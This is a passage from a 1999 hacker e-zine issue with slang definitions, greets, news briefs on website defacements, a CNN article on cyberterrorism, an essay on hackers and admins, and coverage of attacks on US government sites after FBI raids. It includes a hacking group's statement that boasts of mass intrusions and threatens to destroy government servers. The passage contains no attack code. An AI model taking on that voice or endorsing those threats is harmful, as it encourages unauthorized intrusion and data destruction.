  685.     NFC   - Depends on context: No Further Comment or No Fucking Comment
  686.  
  687.     NFR   - Network Flight Recorder (Do a websearch) see 0wn3d
  688.  
  689.     NFW   - No fuckin'way
  690.  
  691.    *0WN3D - You are cracked and owned by an elite entity see pheer
  692.    *OFCS  - Oh for christ's sakes
  693.  
  694.     PHACV - And variations of same <coff>
  695.             Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
  696.  
  697.           Alternates: H - hacking, hacktivist
  698.                       C - Cracking <software>
  699.                       C - Cracking <systems hacking>
  700.                       V - Virus
  701.                       W - Warfare <cyberwarfare usually as in Jihad>
  702.                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
  703.                       P - Phreaking, "telephone hacking" PHone fREAKs ...
  704.                      CT - Cyber Terrorism
  705.  
  706.    *PHEER -  This is what you do when an ereet or elite person is in your presence
  707.             see 0wn3d
  708.  
  709.    *RTFM  - Read the fucking manual - not always applicable since some manuals are
  710.             pure shit but if the answer you seek is indeed in the manual then you
  711.             should have RTFM you dumb ass.
  712.  
  713.     TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0
  714.  
  715.     TBA   - To Be Arranged/To Be Announced also 2ba
  716.  
  717.     TFS   - Tough fucking shit.
  718.  
  719.    *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
  720.             from the underground masses. also "w00ten" <sic>
  721.  
  722.             2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
  723.  
  724.     *wtf  - what the fuck
  725.  
  726.     *ZEN  - The state you reach when you *think* you know everything (but really don't)
  727.             usually shortly after reaching the ZEN like state something will break that
  728.             you just 'fixed' or tweaked.
  729.             
  730.      @HWA            
  731.      
  732.      
  733.                             -=-    :.    .:        -=-
  734.                             
  735.                             
  736.                             
  737.  
  738.  01.0 Greets!?!?! yeah greets! w0w huh. - Ed
  739.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  740.  
  741.      Thanks to all in the community for their support and interest but i'd
  742.      like to see more reader input, help me out here, whats good, what sucks
  743.      etc, not that I guarantee i'll take any notice mind you, but send in
  744.      your thoughts anyway.
  745.  
  746.  
  747.        * all the people who sent in cool emails and support
  748.        
  749.      FProphet       Pyra                TwstdPair      _NeM_
  750.      D----Y         Kevin Mitnick (watch yer back)     Dicentra
  751.      vexxation      sAs72               Spikeman       Astral
  752.      p0lix          Vexx                g0at security
  753.      
  754.      Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
  755.      and to t4ck for making my night albeit I couldn't stick around for
  756.      the rest of the comedy routine. hacked star dot star with phf huh?
  757.      .... ;-))
  758.           
  759.      and the #innerpulse, crew and some inhabitants of #leetchans .... 
  760.      although I use the term 'leet loosely these days, <k0ff><snicker>  ;)
  761.        
  762.      
  763.      kewl sites:
  764.  
  765.      + http://www.l0pht.com/
  766.      + http://www.2600.com/
  767.      + http://www.freekevin.com/
  768.      + http://www.genocide2600.com/
  769.      + http://www.genocide2600.com/~spikeman/
  770.      + http://www.genocide2600.com/~tattooman/
  771.      + http://www.hackernews.com/ (Went online same time we started issue 1!)
  772.      + http://www.net-security.org/
  773.      + http://www.slashdot.org/
  774.      + http://www.freshmeat.net/
  775.      + http://www.403-security.org/
  776.      + http://ech0.cjb.net/
  777.  
  778.      @HWA
  779.  
  780.  
  781.  01.1 Last minute stuff, rumours and newsbytes
  782.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  783.  
  784.        "What is popular isn't always right, and what is right isn't
  785.          always popular..."
  786.                            - FProphet '99
  787.                            
  788.        
  789.  
  790.     +++ When was the last time you backed up your important data?
  791.     
  792.     
  793.     ++  INN Gone?
  794.     
  795.         From ProjectGamma http://www.projectgamma.com/news/34.html
  796.  
  797.         June 2, 1999, 00:09
  798.         Author: WHiTe VaMPiRe
  799.  
  800.         Innerpulse News Network (INN) has a message on their Web site stating that it was taken down by
  801.         order of the U.S. government for transmitting military secrets to the Chinese.  
  802.  
  803.         The validity of this message is unknown. It could just be another joke perpetuated by s1ko, the 
  804.         Webmaster of INN. Once Project Gamma discovers the validity of the message you will be the first
  805.         to know. 
  806.  
  807.         Related links: 
  808.         Innerpulse News Network   
  809.         http://www.innerpulse.com/
  810.     
  811.  
  812.     ++  Ultratech Hacked by Infiltrators Inc.
  813.     
  814.         From ProjectGamma, http://www.projectgamma.com/news/38.html 
  815.  
  816.         June 3, 1999, 01:13
  817.         Author: nexus
  818.  
  819.         Ultratech-is.net was recently hacked by a new group on the net named Infiltrators Inc.,
  820.         a new security group formed by "nexus."  Officials at Ultratech were alerted to the 
  821.         security breach and have secured the server with the help of Infiltrators Inc.
  822.  
  823.         Ultratech's site remained "altered" for approximately 5 hours, and was still undiscovered
  824.         by admins.  The group then removed the altered page and reposted the origional as the admins
  825.         still did not notice.  The site was hacked using a private exploit made by Shiva2000 of
  826.         Infiltrators Inc. to gain root access.  This is the first webpage altered by the group, who
  827.         was founded May 24, 1999.
  828.  
  829.         Related Links: 
  830.         Ultratech website
  831.         http://www.ultratech-is.net
  832.     
  833.         Reported by nexus 
  834.     
  835.     
  836.     ++  OpenSEC Mailing List 
  837.  
  838.         From HNN http://www.hackernews.com/
  839.  
  840.         contributed by cult_hero 
  841.         A new mailing list has popped up called OpenSEC (Open
  842.         Security Solutions). This list is dedicated to announcing
  843.         the latest versions of free and Open Source security
  844.         tools. For more information, 
  845.  
  846.         Open Security Solutions
  847.         http://www.opensec.net
  848.         
  849.     
  850.     ++  HIR #9 
  851.          
  852.         From HNN http://www.hackernews.com/
  853.         
  854.         contributed by h_i_r 
  855.         HiR E-Zine Crew brings forth Hackers Information
  856.         Report: Issue #9. Covered in HiR 9: An Operating
  857.         system comparison (FreeBSD, RedHat 5.2, and NT4),
  858.         **How to make your own Acoustic coupler**, and all
  859.         sorts of other goodies and cool stuff. Check it out. 
  860.  
  861.         HiR Distro Site
  862.         http://axon.jccc.net/hir/
  863.         
  864.         
  865.     ++  The New Antidote is Available. 
  866.         
  867.         From HNN http://www.hackernews.com/
  868.  
  869.         contributed by Lord Oak 
  870.         With more info on Cold Fusion Fixes, Bomb making
  871.         information on the net, and Social Engineering, Antidote
  872.         has released its newest issue. 
  873.  
  874.         Antidote Volume 2 Issue 6     
  875.         http://www.thepoison.org/antidote/issues/vol2/6.txt
  876.         
  877.     
  878.     
  879.       Mucho thanks to Spikeman for directing his efforts to our cause of bringing
  880.       you the news we want to read about in a timely manner ... - Ed
  881.  
  882.      @HWA
  883.  
  884.  01.2 MAILBAG - email and posts from the message board worthy of a read
  885.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  886.  
  887.       NO mail this week for posting here!
  888.             
  889.        ================================================================       
  890.  
  891.       @HWA
  892.  
  893.  
  894.  02.0 From the editor.
  895.       ~~~~~~~~~~~~~~~~
  896.  
  897.      #include <stdio.h>
  898.      #include <thoughts.h>
  899.      #include <backup.h>
  900.  
  901.      main()
  902.      {
  903.       printf ("Read commented source!\n\n");
  904.  
  905.      /*
  906.       *
  907.       *#21? yep, enjoy ...
  908.       *
  909.       *
  910.       *
  911.       *
  912.       *
  913.       *
  914.       *
  915.       *
  916.       */
  917.       printf ("EoF.\n");
  918.       }
  919.  
  920.  
  921.       Congrats, thanks, articles, news submissions and kudos to us at the
  922.      main address: hwa@press.usmc.net complaints and all nastygrams and
  923.      mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
  924.      127.0.0.1, private mail to cruciphux@dok.org
  925.  
  926.      danke.
  927.  
  928.      C*:.
  929.  
  930.  
  931.      @HWA
  932.  
  933.  
  934.  03.0 [CNN] Bracing for querrilla warfare in cyberspace
  935.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  936.       
  937.       
  938.       Bracing for guerrilla warfare in cyberspace
  939.       http://www.cnn.com/TECH/specials/hackers/cyberterror/
  940.  
  941.  
  942.      'There are lots of opportunities; that's very scary'
  943.  
  944.       April 6, 1999
  945.       Web posted at: 2:29 p.m. EDT (1829 GMT)
  946.  
  947.       By John Christensen
  948.       CNN Interactive 
  949.       
  950.       (CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling
  951.       power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously
  952.       knocked off the flight control system and crashes in Kansas. 
  953.       
  954.       Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail
  955.       and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have
  956.       been attacked. 
  957.       
  958.       As incidents mount, the stock market drops precipitously, and panic surges through the population. 
  959.       
  960.       Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not
  961.       just a threat, it has already happened. 
  962.       
  963.       Much of the scenario above --
  964.       except for the plane and stock
  965.       market crashes and the panic --
  966.       occurred in 1997 when 35 hackers
  967.       hired by the National Security Agency launched simulated attacks on
  968.       the U.S. electronic infrastructure. 
  969.       
  970.                 "Eligible Receiver," as the exercise
  971.                 was called, achieved "root level"
  972.                 access in 36 of the Department of
  973.                 Defense's 40,000 networks. The
  974.                 simulated attack also "turned off"
  975.                 sections of the U.S. power grid,
  976.                 "shut down" parts of the 911
  977.                 network in Washington, D.C., and
  978.                 other cities and gained access to
  979.                 systems aboard a Navy cruiser at
  980.                 sea. 
  981.       
  982.                 At a hearing in November 1997,
  983.                 Sen. Jon Kyl, R-Arizona, chairman of
  984.                 a Senate technology subcommittee,
  985.                 
  986.       reported that nearly two-thirds of U.S. government computers
  987.       systems have security holes. 
  988.       
  989.       "If somebody wanted to launch an attack," says Fred B. Schneider, a
  990.       professor of computer science at Cornell University, "it would not be
  991.       at all difficult." 
  992.       
  993.       'There are lots of opportunities'
  994.       
  995.       Although "Eligible Receiver" took place in the United States, which has
  996.       about 40 percent of the world's computers, the threat of
  997.       cyberterrorism is global. 
  998.       
  999.       Consider: 
  1000.       
  1001.       During the Gulf War, Dutch hackers stole information about U.S.
  1002.       troop movements from U.S. Defense Department computers and
  1003.       tried to sell it to the Iraqis, who thought it was a hoax and
  1004.       turned it down.
  1005.       
  1006.       In March 1997, a 15-year-old Croatian youth penetrated
  1007.       computers at a U.S. Air Force base in Guam.
  1008.       
  1009.       In 1997 and 1998, an Israeli youth calling himself "The Analyzer"
  1010.       allegedly hacked into Pentagon computers with help from
  1011.       California teen-agers. Ehud Tenebaum, 20, was charged in
  1012.       Jerusalem in February 1999 with conspiracy and harming
  1013.       computer systems.
  1014.       
  1015.       In February 1999, unidentified hackers seized control of a British
  1016.       military communication satellite and demanded money in return
  1017.       for control of the satellite.
  1018.       
  1019.       The report was vehemently denied by the British military, which
  1020.       said all satellites were "where they should be and doing what
  1021.       they should be doing." Other knowledgable sources, including
  1022.       the Hacker News Network, called the hijacking highly unlikely.
  1023.       
  1024.       "There are lots of opportunities," says Schneider. "That's very scary." 
  1025.       
  1026.       'The Holy Grail of hackers'
  1027.       
  1028.       President Clinton announced in January 1999 a $1.46 billion initiative
  1029.       to deal with U.S. government computer security -- a 40 percent
  1030.       increase over fiscal 1998 spending. Of particular concern is the
  1031.       Pentagon, the military stronghold of the world's most powerful nation. 
  1032.       
  1033.       "It's the Holy Grail of hackers," says computer security expert Rob
  1034.       Clyde. "It's about bragging rights for individuals and people with weird
  1035.       agendas." 
  1036.       
  1037.       Clyde is vice president and general manager of technical security for
  1038.       Axent Technologies, a company headquartered in Rockville, Maryland,
  1039.       that counts the Pentagon as one of its customers. 
  1040.       
  1041.       The Defense Department acknowledges between 60 and 80 attacks a
  1042.       day, although there have been reports of far more than that. 
  1043.       
  1044.                The government says no top secret
  1045.                material has ever been accessed by
  1046.                these intruders, and that its most
  1047.                important information is not online.
  1048.                But the frustration is evident. 
  1049.       
  1050.                Michael Vatis, director of the FBI's
  1051.                National Infrastructure Protection
  1052.                Committee, told a Senate
  1053.                subcommittee last year that tracing
  1054.                cyberattacks is like "tracking vapor." 
  1055.       
  1056.                'A lot of clueless people'
  1057.       
  1058.                Schneider says the "inherently
  1059.                vulnerable" nature of the electronic
  1060.                infrastructure makes counterterrorism
  1061.                measures even more difficult.
  1062.                Schneider chaired a two-year study
  1063.                by the National Academy of Sciences
  1064.                and the National Academy of
  1065.                Engineering that found that the
  1066.                infrastructure is badly conceived and
  1067.                poorly secured. 
  1068.       
  1069.                "There is a saying that the amount of
  1070.                'clue' [knowledge] on the Internet is
  1071.                constant, but the size of the
  1072.                Internet is growing exponentially,"
  1073.                says Schneider. "In other words,
  1074.                there are a lot of clueless people out
  1075.                there. It's basically a situation where
  1076.                people don't know how to lock the
  1077.                door before walking out, so more and
  1078.                more machines are vulnerable." 
  1079.       
  1080.                Schneider says the telephone system
  1081.                is far more complicated than it used
  1082.                to be, with "a lot of nodes that are
  1083.                programmable, and databases that
  1084.                can be hacked." Also, deregulation of
  1085.                the telephone and power industries
  1086.                has created another weakness: To
  1087.                stay competitive and cut costs,
  1088.                companies have reduced spare
  1089.                capacity, leaving them more
  1090.                vulnerable to outages and disruptions
  1091.                in service. 
  1092.       
  1093.       Still another flaw is the domination of the telecommunications system
  1094.       by phone companies and Internet service providers (ISPs) that don't
  1095.       trust each other. As a result, the systems do not mesh seamlessly
  1096.       and are vulnerable to failures and disruptions. 
  1097.       
  1098.       "There's no way to organize systems built on mutual suspicion,"
  1099.       Schneider says. "We're subtly changing the underpinnings of the
  1100.       system, but we're not changing the way they're built. We'll keep
  1101.       creating cracks until we understand that we need a different set of
  1102.       principles for the components to deal with each other." 
  1103.       
  1104.       'The democratization of hacking'
  1105.       
  1106.       Meanwhile, the tools of mayhem are readily available. 
  1107.       
  1108.       There are about 30,000 hacker-oriented sites on the Internet, bringing
  1109.       hacking -- and terrorism -- within the reach of even the technically
  1110.       challenged. 
  1111.       
  1112.       "You no longer have to have knowledge, you just have to have the time," Clyde says. "You just
  1113.       download the tools and the programs. It's the democratization  of hacking. And with these
  1114.       programs ... they can click on a  button and send bombs to your network, and the systems will go
  1115.       down." 
  1116.       
  1117.       Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and
  1118.       farmers. 
  1119.       
  1120.       In 1995, a New Jersey farmer yanked up a cable with his backhoe,
  1121.       knocking out 60 percent of the regional and long distance phone
  1122.       service in New York City and air traffic control functions in Boston,
  1123.       New York and Washington. In 1996, a rodent chewed through a cable
  1124.       in Palo Alto, California, and knocked Silicon Valley off the Internet for
  1125.       hours. 
  1126.       
  1127.       "Although the press plays up the security aspect of hacker problems,"
  1128.       says Schneider, "the other aspect is that the systems are just not
  1129.       built very reliably. It's easy for operators to make errors, and a gopher
  1130.       chewing on a wire can take out a large piece of the infrastructure.
  1131.       That's responsible for most outages today." 
  1132.       
  1133.       'The prudent approach'
  1134.       
  1135.       Schneider and Clyde favor a team of specialists similar to Clinton's
  1136.       proposed "Cyber Corps" program, which would train federal workers to
  1137.       handle and prevent computer crises. But they say many problems can
  1138.       be eliminated with simple measures. 
  1139.       
  1140.                 These include "patches" for
  1141.                 programs, using automated tools to
  1142.                 check for security gaps and
  1143.                 installing monitoring systems and
  1144.                 firewalls. Fixes are often free and
  1145.                 available on the Internet, but many
  1146.                 network administrators don't install
  1147.                 them. 
  1148.       
  1149.                 A step toward deterrence was
  1150.                 taken in 1998 when CIA Director
  1151.                 George Tenet announced that the
  1152.                 United States was devising a
  1153.                 computer program that could attack
  1154.                 the infrastructure of other
  1155.       countries. 
  1156.       
  1157.       "That's nothing new," says Clyde, "but it's the first time it was publicly
  1158.       announced. If a country tries to destroy our infrastructure, we want
  1159.       to be able to do it back. It's the same approach we've taken with
  1160.       nuclear weapons, the prudent approach." 
  1161.       
  1162.       The U.S. Government Accounting Office estimates that 120 countries
  1163.       or groups have or are developing information warfare systems. Clyde
  1164.       says China, France and Israel already have them, and that some
  1165.       Pentagon intrusions have surely come from abroad. 
  1166.       
  1167.       "We don't read about the actual attacks," says Clyde, "and you
  1168.       wouldn't expect to." 
  1169.       
  1170.       "The Analyzer" was caught after he bragged about his feat in
  1171.       computer chat rooms, but Clyde says the ones to worry about are
  1172.       those who don't brag and don't leave any evidence behind. 
  1173.       
  1174.       "Those are the scary ones," he says. "They don't destroy things for
  1175.       the fun of it, and they're as invisible as possible." 
  1176.       
  1177.                 
  1178.           
  1179.       @HWA
  1180.       
  1181.  04.0 The hacker from an administrator's point of view
  1182.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1183.       
  1184.       Submitted by System (Indonesia)
  1185.       
  1186.       Note: be gentle, this was translated from Indonesian.(ESL)
  1187.       
  1188.       Hacker : An overview from An Admin point of view.
  1189.       by system ( 30 mei 1999 ).
  1190.       
  1191.       
  1192.       Hacker's is an enemy
  1193.       ------------------
  1194.       
  1195.       Yes, that's true. Hacker's is an enemy for an certain of administrators. 
  1196.       Because hacker's to them are very annoyying. They only give an admin a lot of job to do, 
  1197.       from just maintenance the network, now plus he must watch the network, find the hole in his 
  1198.       network, and finally fix his network. Not even in the case when the hacker's can get in to 
  1199.       their network and break / steal / and modify the data's from their network user computers.
  1200.       
  1201.       Being an network adminitrator is not an easy way, not only he must know and understand how 
  1202.       the network goes, he also must have the capabilities to fix unknow error or hacker's intruders 
  1203.       in their network. [ This is what i call a good qualify admin ].
  1204.       
  1205.       But, it is not an easy to find that kind of admin. In this world, there are to many admin that 
  1206.       only know how to maintenance the network but cannot to find the hole in their network, or even 
  1207.       he cannot fix the hole. What they think is " This is not my job, my job is only maintenance the 
  1208.       network, i dont know anything else ".
  1209.       
  1210.       Well, this is the type of admin that call the hacker's an enemy, because they only think that 
  1211.       hacker only give them a job to do. Hacker's only trying to bring down their network. He never 
  1212.       think in the positive way. 
  1213.       
  1214.       But, is this true ??? ...
  1215.       
  1216.       Hacker's is a friend.
  1217.       --------------------
  1218.       
  1219.       Yes, that's true. Hacker's is a friend for a certain of administrator. They give back their 
  1220.       passion of working become live again. The hacker's helping them for strengthen their network.
  1221.       
  1222.       An administrator that call the hacker's as their friend is what i call an high dedication of 
  1223.       admin.
  1224.       
  1225.       Why ?
  1226.       
  1227.       Because that type of admin didn't think about the job that they must take, but they only think 
  1228.       that this is the right time that he has waiting for, it is a time that make their job's not 
  1229.       boring again, now they can find out the hole that exist in their network, and finally he can 
  1230.       fix the right hole in their network.
  1231.       
  1232.       Do you ever fell how good is when you do what you like ?
  1233.       
  1234.       If you do, that is the right felling that administrator fell too. They think hacker's is not 
  1235.       their enemy, but as their friend and their job mate that he must honouring them.
  1236.       
  1237.       Summary
  1238.       -------
  1239.       
  1240.       - So, what is hackers to you ???
  1241.       
  1242.       ###########################################################################################
  1243.       
  1244.       Any comment or suggestion are welcome, please send it to system@hackerlink.or.id
  1245.       You also can see it on my website at http://www.hackerlink.or.id/?hack=artikel.htm
  1246.       
  1247.       ###########################################################################################     
  1248.       
  1249.       
  1250.       @HWA
  1251.       
  1252.       
  1253.  05.0 Retaliation against the FBI continues
  1254.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1255.       
  1256.       Retaliation Against FBI Continues 
  1257.  
  1258.  
  1259.       contributed by mortel 
  1260.       The cracks of he US Senate web site and DoS attacks
  1261.       against the FBI web site was not the end of the
  1262.       protests over recent FBI actions. Last week the FBI
  1263.       executed up to nine search warrants mostly against
  1264.       members of a group known as gH or Global Hell. At this
  1265.       time HNN is not aware of any arrests that have been
  1266.       made. These actions by the FBI have upset a few
  1267.       people and in retaliation have attacked the US
  1268.       Department of Interior web site. 
  1269.  
  1270.       MSNBC
  1271.       http://www.msnbc.com/news/273819.asp
  1272.       
  1273.       Nando Times
  1274.       http://www.techserver.com/story/body/0,1634,54975-87979-624391-0,00.html
  1275.       
  1276.       ABC News
  1277.       http://www.abcnews.go.com/sections/us/DailyNews/computer_hackers990531.html
  1278.       
  1279.       HNN Cracked Pages Archive
  1280.       http://www.hackernews.com/archive/crackarch.html
  1281.       
  1282.  
  1283.       F0rpaxe a group based in Portugal and with close
  1284.       connections to gH has claimed responsibility for defacing
  1285.       numerous web sites over the weekend (see list at
  1286.       bottom) and have also released a statement expressing
  1287.       their view about what has been going on. 
  1288.  
  1289.       
  1290.       F0rpaxe Statement
  1291.       
  1292.        
  1293.                  FORPAXE TECHNOLOGIES INC.
  1294.  
  1295.                          STATEMENT
  1296.  
  1297.      F0rpaxe needs to inform all people what is going on. At this
  1298.      moment and for what we know, F0rpaxe is the only Portuguese group
  1299.      that is executing massive attacks on edu, gov , mil, com,servers.
  1300.      Maybe this is the reason why F0rpaxe is now being wanted by PJ
  1301.      (Portuguese police) and some international organizations like FBI
  1302.      and Interpol. While we had been away for a few days we had watch
  1303.      several events on the Portuguese media whitch in a certain way
  1304.      implicates F0rpaxe. Some newspapers reported that PJ is now doing
  1305.      their homework together with FBI to lock down "Hackers" who
  1306.      aleggely are involved on US hacks. 
  1307.  
  1308.      Also PJ is now our BIG BROTHER since they are gathering efforts
  1309.      to make a net surveillence over POrtugual. For what it seems they
  1310.      have the help of Portuguese ISP's like Telapac. Their goal is to
  1311.      track down hackers...
  1312.  
  1313.      In an article of "EuroNoticias" they call hackers to the ones who
  1314.      use trojans to steal accounts (l0l). If PJ thinks that this is
  1315.      their biggest problem then that info about working together with
  1316.      the FBI is a bulshit... Portugal is now passing through serious or
  1317.      hilarious actions.. IF the goal of PJ is to track down people who
  1318.      use trojans to steal accounts then they have to arrest all
  1319.      population. We think that this isn't their main goal since F0rpaxe
  1320.      had been informed that PJ is trying to get solide proofs that we
  1321.      are the responsables for all those hacks.
  1322.  
  1323.      PJ doesn't scare anyone. IF FBI is really working together with PJ
  1324.      then they are doing this only because of us...most certainly to
  1325.      erase us from the system... FBI had been mounting schemes to
  1326.      track us down.... FBI had already tried to pretend being
  1327.      Iron-Lungs to get info about our current hacks, if we still had
  1328.      acess to gov servers, if we had copyed military databases and all
  1329.      that sort of things...
  1330.  
  1331.      The real I-L reported that the fake I-L wasnÑt him. The guy was
  1332.      always asking things and we just ignored...it could be just
  1333.      a lamer trying to get some info about us... But then the
  1334.      attemptives to track us down started: the guy started to contact
  1335.      people who are closed to F0rpaxe ,like some fo attrition staff, in 
  1336.      order to get our contact like phone etc... They even asked some of
  1337.      them to phone us.... When they realized that we had discover they
  1338.      started trying to get info from all those who surround us...a few
  1339.      days later an article on a newspapper reported that FBI and PJ
  1340.      were (or are?) working together... We don't know if all this is
  1341.      the truth or only a misunderstanding but one thing we know FBI
  1342.      really want us bad and they will do anything to caught us.
  1343.  
  1344.      We think that FBI doesn't want us just because of all the hacks but
  1345.      to show that they have the authoritie to arrest hackers of other
  1346.      country's. Although they need the permissions of the government and
  1347.      that isn't easy. They should be tired of making American Hackers
  1348.      life miserable and now they want to do the same with us....... As
  1349.      we told before we had been away for a while because things were 
  1350.      starting to be pretty bad╓ 
  1351.  
  1352.      Groups who work on the shadow
  1353.      Some groups just disappear but they don't disappear trully..They
  1354.      start working on the shadow because FEDS are always ready to take
  1355.      them down...We thought that it would't happen that with us but
  1356.      sooner or later we will need to go back to where we belong...to
  1357.      the shadow. We also take this chance to show our support with
  1358.      people who are now facing legal troubles, like I-L, dk,
  1359.      Zyklon.....Kevin and all the others who will face them in the
  1360.      future╓ gH has also our support.
  1361.  
  1362.      Information in Portugal 
  1363.      Portuguese media isn╘t aware of all this.... neither some admins
  1364.      who were hacked and nothing was reported....In Portugal people 
  1365.      don't care about what happens...They aren't aware that there are
  1366.      people building an underground system. Ity's just that. On CNN,
  1367.      ZDNET, Wired etc.. they inform what's happening.... In Portugal
  1368.      the media just doesn't give a shit.... Maybe this is the best for
  1369.      us since this will prevent a media hype and PJ and other FEDS
  1370.      won't be after us so soon..but information isn't circulating as
  1371.      it should. People built a bad image of the "hacker". Portuguese
  1372.      media report "hackers" as being the ones who use trojans...
  1373.      Man....they arten't aware of the true meaning of the concept 
  1374.      "hacker"  They should think about it...
  1375.  
  1376.      Why are we doing this?
  1377.      We agree with some of the things that had been said by some groups.
  1378.      We are always hacking and for what? We hack and hack things whitch
  1379.      can be fixed in 2 minutes. In fact we could have done worse like
  1380.      destroying completely all servers. We can do it if we w ant but
  1381.      hackers are waiting for justice. If FBI doesnÑt stop we wonÑt and
  1382.      we can start destroying. We think that FBI should explain what a
  1383.      fuck they are doing. For the moment we wonÑt destroy the servers
  1384.      we hack but if it is necessary we can burn alot of servers. For
  1385.      example this gov server could be erased completly. Everyone
  1386.      should think about this, about whatÑs happening.
  1387.  
  1388.      Don't make all this a media hype just inform in a simple 
  1389.      manner....people need to know. People need to know why all this
  1390.      hacks. People need to know who FBI really is.
  1391.  
  1392.      MSNBC;
  1393.      
  1394.      Tough talk amid new Web assaults
  1395.      White House and federal agencies lay down the law 
  1396.      while computer attackers hit another federal Internet site
  1397.      By Alan Boyle, Bob Sullivan and Brock Meeks
  1398.       
  1399.  
  1400.  
  1401.      June 1 ù  The White House, Pentagon, Justice Department and FBI all addressed a rash of
  1402.      electronic attacks on federal Web sites Tuesday, even as the attackers hit new targets. The protest
  1403.      campaign against last weekÆs FBI raids on  computer users spilled across global cyberspace,
  1404.      from the Pacific to Europe. 
  1405.      
  1406.      THE WEB ONSLAUGHT began nearly a week ago,
  1407.      after FBI agents served search warrants on members of the 
  1408.      hacker community in Washington state, Texas, California
  1409.      and other areas of the country.
  1410.             The raids ù which were aimed at gathering evidence
  1411.      related to past computer intrusions as well as unauthorized
  1412.      use of telephone systems ù sparked attacks that forced the
  1413.      shutdown of the FBI and U.S. Senate Web sites last week.
  1414.      After beefing up security, the Senate site is back in service,
  1415.      but the FBI site is still inaccessible.
  1416.             Scores of protest pages have rudely taunted the FBI,
  1417.      and government officials laid down the law at several news
  1418.      briefings Tuesday.
  1419.             ôCyber-security is something the government takes
  1420.      very seriously,ö White House spokesman Joe Lockhart said
  1421.      in response to a reporterÆs question. ôI know that there
  1422.      have been a series of attempts (to break into government
  1423.      computers) with some success, some without success. ...
  1424.      We take it very seriously. We are constantly reviewing and
  1425.      will continue to review the security measures we have.ö
  1426.             Last month, a group known as Global Hell, or gH, was
  1427.      implicated in attacks on the White House Web site as well
  1428.      as sites for several Cabinet departments and the U.S.
  1429.      Information Agency. Also last month, Global Hell member
  1430.      Eric Burns, who also goes by the name Zyklon, was
  1431.      indicted in connection with attacks on three computers,
  1432.      including the USIA system.
  1433.             
  1434.  
  1435.            White House Web site shut down
  1436.  
  1437.  
  1438.             Lockhart emphasized that those implicated in the latest
  1439.      wave of attacks were liable to face a similar fate.
  1440.             ôFor those who think that this is some sort of sport, I
  1441.      think (it will be) less fun when the authorities do catch up
  1442.      with them ... and these people are prosecuted,ö he said.
  1443.             At another briefing, Pentagon spokesman Kenneth
  1444.      Bacon said system administrators were briefly limiting Web
  1445.      access Tuesday so they could beef up security.
  1446.             He said such measures would make it ômuch more
  1447.      difficultö to deface Pentagon Web pages.
  1448.             ôIt has not been a major problem,ö Bacon said. ôThis is
  1449.      much more protective than reactive. ItÆs looking to the
  1450.      future to prevent the types of problems (seen) at other
  1451.      agencies.ö
  1452.             Federal law-enforcement officials emphasized the harsh
  1453.      criminal penalties that Web intruders could face: Attackers
  1454.      who cause $5,000 worth of damage in one year could be
  1455.      charged with a federal felony that carries up to five years in
  1456.      prison, the head of the Justice DepartmentÆs computer
  1457.      crime section, Scott Charney, told The Associated Press.
  1458.      Merely gaining unauthorized access to a government
  1459.      computer could bring a year in jail, but Charney pointed out
  1460.      that the cost of fixing a compromised Web site could mount
  1461.      to $5,000 in employee time alone.
  1462.             A Dallas telecommunications company suffered a
  1463.      considerable loss ù perhaps ranging into millions of dollars
  1464.      ù because of intrusions that are the subject of the FBIÆs
  1465.      current investigation, bureau spokesman Frank Scafidi said.
  1466.             ôWhat we investigate are violations of law,ö he told
  1467.      MSNBC. ôIf a hacker feels that our investigating
  1468.      somebodyÆs illegal activity is somehow an infringement on
  1469.      that individualÆs freedom to do what he wants to do, then
  1470.      there is a basic misunderstanding of the way this country
  1471.      works.ö
  1472.             Scafidi said there was ôno intention on our part to
  1473.      select a group of people and pick on them. ... They get the
  1474.      first move in this game.ö
  1475.             But he also indicated that the justice system intended to
  1476.      have the last word.
  1477.             ôWhen there is a violation ... we will pursue it, and
  1478.      usually we will knock on somebodyÆs door and maybe take
  1479.      some computer equipment,ö he said. Such equipment may
  1480.      have to be held for months or years, to be used as evidence
  1481.      in a trial or during the appeal process, he said.
  1482.             As for the FBI siteÆs down time, Scafidi said: ôThat
  1483.      isnÆt affecting the FBIÆs investigative response in any way. It
  1484.      is a problem for us in that we rely on our Web site as a
  1485.      place for anybody to go and get information on the FBI for
  1486.      any purpose ... so it is a public information resource for us,
  1487.      and since it has been down it has really been affecting a lot
  1488.      of innocent parties out there.ö 
  1489.  
  1490.  
  1491.             
  1492.             
  1493.      THE LATEST VICTIMS
  1494.             TuesdayÆs governmental victim was the General
  1495.      Services Administration, which manages U.S. government
  1496.      property. At least three pages on the Web site for the
  1497.      GSAÆs Office of Governmentwide Policy ù
  1498.      www.policyworks.gov ù were briefly replaced with
  1499.      protest pages.
  1500.             ôOur sentence is hacking everything we can as a
  1501.      protest to FBI current actions,ö one page read.
  1502.             The hacked pages were accessible for 10 to 15
  1503.      minutes, said Joe McKay, director of office information
  1504.      systems at the Office of Governmentwide Policy. He said
  1505.      the attacker apparently gained access through a security gap
  1506.      related to file transfer protocol, or FTP. 
  1507.             ôWeÆve terminated all FTP services, and I am issuing
  1508.      on a need-to-use basis new FTP access,ö he told MSNBC.
  1509.      The site was working normally Tuesday night, and computer
  1510.      server logs were being analyzed for further clues, he said.
  1511.             ôWeÆre always playing catch-up, it seems,ö he said.
